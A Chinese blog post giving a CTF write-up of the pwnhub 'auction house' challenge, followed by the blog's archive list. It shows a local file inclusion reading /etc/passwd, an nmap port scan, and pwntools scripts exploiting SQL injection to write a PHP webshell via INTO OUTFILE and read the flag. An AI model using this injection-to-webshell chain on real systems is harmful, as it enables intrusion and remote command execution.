

LoRexxar's Blog | 信息技术分享

LoRexxar's Blog | 信息技术分享

pwnhub_拍卖行



pwnhub_拍卖行

sqli pwnhub pwn

 2016/12/18   Share

• 
• 
• 
• 
• 

算是第一次做pwn题，不过有点不得不说，整个题目几乎都是web思路，除了分析bin的部分需要一点儿别的知识，其余都可以web直接做，下面稍微说下吧

由于各种各样的原因吧，最后还是被取消了成绩，不想解释太多，下面的wp已经把之前没有写过的部分全部修改增加上了，整个思路除了使用别人的poc修改，全部都是自己的思路，从一个web选手的角度去思考而已…

总览整个网站，存在任意文件包含漏洞，但是整个站都是假的，没有任何功能。

http://54.223.241.254/?page=/etc/passwd

这里可以读任意文件

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
syslog:x:105:108::/home/syslog:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ctf:x:1000:1000::/home/ctf:
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false

但是没有任何收获，我们顺手看看/proc/self/maps,没有什么特别的收获，所以目光回到提示

 这是pwn题，不用扫。请各位大佬文明驾驶不要搅屎，给大佬递茶。
后端骄傲地采用raft支持, ctf_xinetd部署，独自完成更有趣哦

那么需要既然是ctf_xinetd部署，github搜索一波，找到
https://github.com/Eadom/ctf_xinetd

看dockerfile

FROM ubuntu:14.04

RUN sed -i "s/http:\/\/archive.ubuntu.com/http:\/\/mirrors.tuna.tsinghua.edu.cn/g" /etc/apt/sources.list
RUN apt-get update && apt-get -y dist-upgrade
RUN apt-get install -y lib32z1 xinetd

RUN useradd -m ctf

COPY ./bin/ /home/ctf/
COPY ./ctf.xinetd /etc/xinetd.d/ctf
COPY ./start.sh /start.sh

RUN chmod +x /start.sh
RUN chown -R root:ctf /home/ctf
RUN chmod -R 750 /home/ctf
RUN chmod 740 /home/ctf/flag
RUN cp -R /lib* /home/ctf
RUN cp -R /usr/lib* /home/ctf
RUN mkdir /home/ctf/bin
RUN cp /bin/sh /home/ctf/bin
RUN cp /bin/ls /home/ctf/bin
RUN cp /bin/cat /home/ctf/bin

WORKDIR /home/ctf

CMD ["/start.sh"]

EXPOSE 9999

找到配置文件

service ctf
{
    disable = no
    socket_type = stream
    protocol    = tcp
    wait        = no
    user        = root
    bind        = 0.0.0.0
    server      = /usr/sbin/chroot
    server_args = --userspec=1000:1000 /home/ctf ./raft
    type        = UNLISTED
    port        = 9999
}

找到bin

http://54.223.241.254/?page=/home/ctf/raft

# coding=utf-8

import requests

url = "http://54.223.241.254/?page=/home/ctf/raft"

s = requests.Session()
r = s.get(url)
content = r.content

index = content.find("<!-- SUBSCRIBE SECION -->")
index2 = content.find("<!-- END SUBSCRIBE SECION -->")


f = open("raft","wb+")
f.write(r.content[index+len("<!-- SUBSCRIBE SECION -->")+2:index2])

f.close()

拿到bin后配个环境跑跑看

root@961e74e128a8:/tmp# ./raft 
==========================================
       Do you want date with Firesun?     
==========================================
Loading....... Succeed!
A date with Firesun is on sale!

分析bin主要是这两句

INSERT INTO TOKENS (TOKENS, PASSWORD) VALUES('%s', '%s')
INSERT INTO BID (TOKENS, PRICE) VALUES('%s', '%d')

关键是PASSWORD和PRICE都是可控值，但是PASSWORD输入为字符串，那么就存在注入，我们只要闭合insert,就可以执行任意语句。

由于做法和二进制思路不同，所以这里结论是错的，很抱歉给别人带来了误导，这里我重新解释我对这部分的处理思路。

ida分析函数没什么收获，只知道bin的功能，和web页面中的功能相同，有注册和出价两个功能，help可以看到功能帮助。

那么我觉得应该搭一个本地环境，稍微搭起来就可以测试了，如果这步不能理解，我想测试一下就可以知道了。在你一切都没有配置的情况下，运行程序，输入reg 123，会爆链接错误，但是可以看到用户，然后strings一下

后面也是一样，会爆表不存在，那么建表，紧接着会爆字段错误，可以直接跟着报错建表，也可以

表结构很清楚了，搭好了就是测试，主要就是两个功能，bid出价和注册，正常的逻辑都是先注册在出价，随便测试一下没什么收获

from pwn import *
context.log_level = 'debug'

R = process('./raft')
#R = remote('54.223.241.254',22333)

R.recvuntil('A date with Firesun is on sale!\n')
q = '555asdf'

R.send('reg '+q+'\n')
R.recv()

R.send('bid '+'233333'+'\n')
R.recv()

R.interactive()

反过来试试看

context.log_level = 'debug'

R = process('./raft')
#R = remote('54.223.241.254',22333)

R.recvuntil('A date with Firesun is on sale!\n')
q = '555asdf'

R.send('bid '+q+'\n')
R.recv()

R.send('reg '+'233333'+'\n')
R.recv()

R.interactive()

这里一般来说会有两种结果，第一种是正常的。

TOKENS表中password被正常处理。

另一种是发生了错误

这种就是不返回token的，我们看看数据库

在TOKENS表里直接写入了字符串，回想前面strings得到的语句。

INSERT INTO TOKENS (TOKENS, PASSWORD) VALUES('%s', '%s')
INSERT INTO BID (TOKENS, PRICE) VALUES('%s', '%d')

这里我没想那么多，因为存在可控点为password和price两个，一个输入为%d，所以会发生截断，另一个输入为%s，猜测有注入点，测试一下。

from pwn import *
context.log_level = 'debug'

R = process('./raft')
#R = remote('54.223.241.254',22333)

R.recvuntil('A date with Firesun is on sale!\n')
q = '555asdf\''

R.send('bid '+q+'\n')
R.recv()

R.send('reg '+'233333'+'\n')
R.recv()

R.interactive()

报错了，那么任意构造语句，仔细观察可以发现，在线上的web部分，还有返回值是数据库中的。

讲道理到这里对于一个webU•ェ•*U就已经很简单了。

对于一个注入点来说，对于一个正常的web选手来说，可显注，可显错注入（有报错），然后测试一下就发现，线上数据库权限非常高，可以随便写文件（into outfile），再加上有任意文件包含，那么就可以随便getshell…

但是问题来了，服务端口在哪，苦寻无果，nmap一波

root@iZ285ei82c1Z:~# nmap -sT -Pn 54.223.241.254 -p10000-60000

Starting Nmap 6.40 ( http://nmap.org ) at 2016-12-18 16:05 CST
Nmap scan report for ec2-54-223-241-254.cn-north-1.compute.amazonaws.com.cn (54.223.241.254)
Host is up (0.035s latency).
Not shown: 49999 closed ports
PORT      STATE SERVICE
22222/tcp open  unknown
22333/tcp open  unknown

找到了22333就是服务端口，然后就很简单了，既然可以注入先翻翻数据库，数据库没东西，那么就写webshell。

这里碰到了nonick搅屎删文件，还强行竞争了一波杀了它的进程

from pwn import *
context.log_level = 'debug'

#R = process('./raft')
R = remote('54.223.241.254',22333)

R.recvuntil('A date with Firesun is on sale!\n')
dddd = '2333\');select \'<?php system($_POST["ddog"]) ?>\' into outfile \'/tmp/ddog3\';#'

R.send('bid '+q+'d'*(995-len(dddd))+'\n')
R.send('reg '+'2'*995+'\n')
R.recv()
R.interactive()

get flag

http://54.223.241.254/?page=/tmp/ddog3

ddog=cat /home/ctf/this-is-real-flag000

所有思路都已经说明白了，如果还有人觉得有问题的话，可以直接细聊我，关于更多的事情，我没能力解释更多，只能说多说无益，借用脚本确实有错，所以被取消分数也没有太多怨言，但是更多事情只能说很多事情自在人心….以后就不做pwn题了，也免得给大家带来困扰

原文作者：LoRexxar

原文链接：https://lorexxar.cn/2016/12/18/pwnhub-pai2/

发表日期：December 18th 2016, 11:22:00 pm

更新日期：September 29th 2020, 2:11:23 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  浅谈xss的后台守护问题
• Previous Post
  pwnhub_找朋友

Powered by Hexotheme Archer

PV: :)

CATALOG

• Archive
• Tag
• Cate

Total : 205

2023

• 12/18 人与代码的桥梁-聊聊SAST
• 11/21 Joern In RealWorld (3) - 致远OA A8 SSRF2RCE
• 10/26 Joern In RealWorld (2) - Jumpserver随机数种子泄露导致账户劫持漏洞（CVE-2023-42820）
• 10/20 深入浅出Joern（四）不常用语法大全
• 08/31 Joern In RealWorld (1) - Acutators + CVE-2022-21724
• 08/24 深入浅出Joern（三）Joern和Neo4j常用语法大全
• 08/22 深入浅出Joern（二）CPG与图数据库
• 08/21 深入浅出Joern（一）Joern与CPG是什么？
• 07/19 打造自己的AIGC应用（一）入门篇
• 06/21 赛博偶像速成指南（三）- Midjourney
• 06/02 赛博偶像速成指南（二）- SD进阶篇
• 05/25 从0到1的ChatGPT - 进阶篇（五）- Embeddings
• 05/19 从0到1的ChatGPT - 进阶篇（四）- 训练自己的ChatGPT
• 05/08 看上去不起眼的微信机器人以及公众号爬虫
• 04/28 从0到1的ChatGPT - 进阶篇（三）- ChatGPT+？
• 04/26 从0到1的ChatGPT - 入门篇（二） - 如何与ChatGPT对话？
• 04/14 从0到1的ChatGPT - 入门篇
• 02/21 赛博偶像速成指南

2022

• 11/02 CS Xss2Rce CVE-2022-39197分析与复现
• 04/14 SCA的困境和出路
• 03/21 人生的第二个可能~

2021

• 12/10 log4j2 JNDI注入漏洞速通~
• 08/17 DevSecOps 究竟需要怎样的白盒？
• 08/17 从0开始入门Chrome Ext安全（三） -- 你所未知的角落 - Chrome Ext安全
• 08/06 区块链安全罪与罚 -- 浅谈区块链与安全发展史
• 05/19 创宇四年
• 04/16 反制Webdriver - 从Bot到RCE进发
• 03/09 通达OA代码审计篇二 - 11.8 后台Getshell
• 03/03 通达OA代码审计篇 - 11.7 有条件的任意命令执行
• 02/05 如何自动化挖掘php反序列化链 - phpunserializechain诞生记
• 01/28 为被动扫描器量身打造一款爬虫-LSpider

2020

• 10/30 构造一个CodeDB来探索全新的白盒静态扫描方案
• 09/21 从0开始聊聊自动化静态代码审计工具
• 07/14 Geekpwn 2020云端挑战赛 Noxss & umsg
• 07/08 从反序列化到类型混淆漏洞 -- 记一次ecshop实例利用
• 06/10 Roundcube mail 3 Xss
• 05/29 Roundcube mail代码审计笔记
• 05/11 空指针-Base on windows Writeup -- 最新版DZ3.4实战渗透
• 02/03 从0开始入门Chrome Ext安全（番外篇） -- Zoomeye Tools
• 01/14 CSS-T | Mysql Client 任意文件读取攻击链拓展

2019

• 12/30 pwnhub 被污染的Jade
• 12/05 从0开始入门Chrome Ext安全（二） -- 安全的Chrome Ext
• 11/22 从0开始入门Chrome Ext安全（一） -- 了解一个Chrome Ext
• 10/25 PHP-fpm 远程代码执行漏洞(CVE-2019-11043)分析
• 09/23 从零开始学java web - struts2 RCE分析
• 07/23 CVE-2019-11229详细分析 --git config可控-RCE
• 07/10 Redis 基于主从复制的RCE利用方式
• 06/12 Mybb 18.20 From Stored XSS to RCE 分析
• 05/28 MIMIC Defense CTF 2019 final writeup
• 04/19 Drupal 1-click to RCE分析
• 03/14 聊聊WordPress 5.1.1 CSRF to RCE漏洞
• 02/22 Wordpress 5.0 RCE详细分析

2018

• 12/07 Discuz x3.4前台SSRF分析
• 12/07 Code Breaking挑战赛 Writeup
• 12/01 以太坊智能合约审计CheckList
• 11/20 LCTF2018 ggbank 薅羊毛实战
• 11/16 从DVP GAME到变量覆盖问题
• 11/14 HCTF2018部分Web题目Writeup
• 11/12 HCTF2018智能合约两则Writeup
• 11/08 “以太坊智能合约编码隐患”影响分析报告
• 10/18 智能合约游戏之殇——Dice2win安全分析
• 09/25 “以太坊智能合约编码设计问题”影响分析报告
• 09/14 blockwell.ai 虚假转账 事件分析
• 09/06 “以太坊智能合约编码安全问题”影响分析报告
• 08/24 智能合约游戏之殇-类Fomo3D攻击分析
• 08/22 “以太坊智能合约设计缺陷问题”影响分析报告
• 08/14 “以太坊智能合约规范问题”影响分析报告
• 07/13 wctf2018 cyber mimic defence Writeup
• 05/31 0CTF/TCTF2018 Final Web Writeup
• 05/23 RCTF2018 Web Writeup
• 04/20 基于Service Worker 的XSS攻击面拓展
• 04/17 TCTF/0CTF2018 h4x0rs.space Writeup
• 04/10 TCTF/0CTF2018 h4xors.club2 Writeup
• 04/05 TCTF/0CTF2018 部分Web Writeup
• 04/05 TCTF/0CTF2018 XSS bl0g Writeup
• 03/26 强网杯2018 Web writeup
• 02/23 吐槽HCTF2017
• 02/07 从补丁到漏洞分析 --记一次joomla漏洞应急
• 01/19 DeDeCMS v5.7 密码修改漏洞分析
• 01/02 34c3 Web部分Writeup

2017

• 12/19 WordPress Updraftplus 插件漏洞2则以及一些有趣的故事
• 11/15 HCTF2017 babycrack Writeup
• 11/15 HCTF2017-Deserted place-Writeup
• 11/15 HCTF2017-A World Restored-Writeup
• 11/10 HITCON2017-writeup整理
• 10/26 typecho前台getshell漏洞分析
• 10/25 前端防御从入门到弃坑--CSP变迁
• 10/25 WordPress安全架构分析
• 09/30 Discuz!X 3.4 任意文件删除漏洞分析
• 08/31 阿里先知xss挑战赛 Writeup
• 08/31 Discuz_X authkey安全性漏洞分析
• 08/23 从瑞士军刀到变形金刚--XSS攻击面拓展
• 08/15 pwnhub 改行做前端
• 07/26 finecms分析
• 07/23 xssgame writeup
• 07/20 FineCMS multi vulnerablity before v5.0.9
• 07/11 Some Vulnerability for FineCMS through 2017.7.11
• 07/11 第十届信息安全国赛 Web MISC writeup
• 07/07 WordPress WP Statistics authenticated xss Vulnerability(WP Statistics <=12.0.9)
• 06/16 0ctf2017 final
• 05/23 RCTF2017 web writeup
• 05/16 通过浏览器缓存来bypass CSP script nonce
• 05/12 PlaidCTF 2017 web writeup
• 05/12 xss bot从入门到弃坑
• 05/09 CSP Is Dead, Long Live CSP! 翻译
• 04/24 pwnhub 绝对防御 出题思路和反思
• 04/21 Shadow Brokers大新闻整理
• 04/21 360春秋杯2017 writeup
• 04/18 bctf2017 web部分wp
• 03/27 pwnhub 之小m的复仇
• 03/21 0ctf201 web部分writeup
• 03/13 NJCTF Web部分writeup
• 03/05 pwnhub_another php web部分
• 02/27 zctf2017 writeup
• 02/20 pwnhub 打开电脑
• 02/16 有趣的cdn bypass CSP
• 01/26 聊聊hctf2016
• 01/17 pwnhub 深入敌后
• 01/03 33c32016 writeup

2016

• 12/28 phpmailer RCE漏洞分析
• 12/26 pwnhub_迷
• 12/24 浅谈xss的后台守护问题
• 12/18 pwnhub_找朋友
• 12/18 pwnhub_拍卖行
• 12/10 pwnhub_WTF_writeup
• 12/07 using polyglot JPEGs bypass CSP 分析
• 12/03 通过redis getshell的一些小问题
• 12/01 hctf2016 简单部分WEB && misc writeup
• 11/30 hctf2016 guestbook&secret area writeup
• 11/29 HCTF2016 ATField writeup
• 11/19 hctf2016 giligili writeup
• 10/31 CSP进阶-302 Bypass CSP
• 10/28 CSP进阶-link Bypass unsafe line
• 10/26 什么是ctf呢？
• 10/11 hitcon2016 misc writeup
• 10/10 hitcon2016 web writeup
• 10/03 L-ctf2016 Writeup
• 09/14 php 伪协议
• 09/11 华山杯2016_writeup
• 08/29 crypto 简单的RSA
• 08/18 sqlmap 源码分析（四）开始注入
• 08/16 sqlmap 源码分析（三）在注入之前
• 08/11 sqlmap 源码分析（二）初始化
• 08/09 sqlmap 源码分析（一）开始、参数解析
• 08/08 CSP Level 3浅析&简单的bypass
• 08/07 python virtualenv沙盒命令
• 08/01 XNUCA2016 Writeup
• 07/21 python tqdm模块分析
• 07/18 shell上一些有趣的命令
• 07/17 sangebaimao之火币网
• 07/12 信息安全国赛技能赛 Writeup
• 06/26 一个有趣的东西-cloudeye
• 06/17 sangebaimao之招聘又开始了，你怕了吗？
• 06/06 alictf2016_web_writeup
• 06/04 sangebaimao 寻找来自星星的你一
• 05/27 在php opcache检测隐藏的后门程序
• 05/12 php webshell 各种函数
• 05/10 Asis2016_Binary Cloud
• 05/09 sctf2016_writeup
• 05/05 dockerfile (・ω・)ノ
• 05/04 docker 基础操作
• 05/02 google_ctf2016_writeup
• 04/25 CCTF2016_writeup
• 04/20 gif bypass CSP?
• 04/11 j123jt的聊天板大型wp
• 04/11 sctfq1_Obfusion_writeup
• 04/08 input属性bypass csp
• 04/06 hctfgame_ll的流量分析题
• 04/04 is_numeric和trim导致的判断绕过
• 03/30 web_for_pentest_II writeup
• 03/22 bctf2016
• 03/14 hctf_game_week4+5_writeup
• 03/14 0ctf2016 && sunshinectf2016 writeup
• 03/07 bkp2016_writeup
• 03/05 hexo转移到coding配置
• 03/01 ssctf2015_writeup
• 02/29 hctf_game_week3_writeup
• 02/28 ldpa简单注入
• 02/28 titan souls 普通模式通关攻略
• 02/18 简单的git教程
• 02/18 hctf_game_week2_writeup
• 02/18 hctf_game_week1_writeup
• 02/18 hctf_game_week0_writeup

2015

• 12/21 《代码审计》一点儿笔记
• 12/19 hctf2015的一点儿记录
• 11/19 xss link&svg黑魔法
• 11/19 SQL 显错注入
• 11/17 ISG2015_writeup
• 11/17 RCTF2015_writeup
• 11/02 SPWC & 华山杯？ writeup
• 10/24 关于sqli注入的特殊函数
• 10/04 XDCTF2015-writeup
• 09/28 Nsctf2015_Writeup
• 07/02 xss无声挑战赛_writeup
• 06/11 ctf近期总结
• 05/22 Windows Hexo博客安装配置优化（小白篇）
• 05/21 Hduisa_ctf_wee4_fucksql
• 05/10 Web for pentester_writeup
• 02/26 Hduisa_ctf_writeup01
• 02/26 Hduisa_ctf_writeup02
• 02/26 （转）十年学会程序设计
• 01/22 0基础如何学好WEB（转）

2014

• 12/31 凤凰挽歌，黑客独白（作者：我是老鹰&炫凤舞）
• 12/29 （转）学长们给我们的书目（结尾附上PDF地址）
• 12/29 菜鸟小白的开始...

 ctf  Blogs  sqli  CSP  xss  java  csp  ssrf  redis  opcache  nodejs  race  postMessage  pdflatex  csrf  cve  Hexo  Shadow Brokers  0day  windows  php  c  curl  Reprint  bookshelf  chrome_ext  chrome  dns  cloudeye  cmd  shell  linux  node  contract  crypto  RSA  rabins  mysql  phpmailer  dedecms  逻辑漏洞  book_notes  智能合约  docker  phar  rce  dvp  ctf web  漏洞分析  dz  反序列化漏洞  类型混淆漏洞  ecshop  git  access  伪协议  eth  Fomo3D  Essay  checklist  hctf  misc  php opcache  eassy  jsre  clrf  struts2  injection  mimic  pwnhub  flask  格式化字符串  模板注入  wget  js  weblogic  lfi  pwn  LFI  win server信息收集  msf  lcx端口转发  IPC通道入侵  fastcgi  ssh_sock5  python  tqdm  virtualenv  open_basedir  crontab  roundcube  sangebaimao  参数污染  CBC  LD_PRELOAD  gopher  fcgi  Essry  php伪协议  file_put_contents  sqlmap  game  titan_souls  wordpress  代码审计  条件竞争  SAST  tools  白盒  静态分析  django  LSpider  爬虫  tongda  webdriver  随笔  blockchain  devsecops  whitebox  chrome ext  log4j2  jndi  blog  sca  sast  cs  CVE-2022-39197  chatgpt  wechat  llm  embeddings  aicg  sd  midjourney  aigc  joern  cpg  neo4j  oa



缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98

 Blogs  Reprint

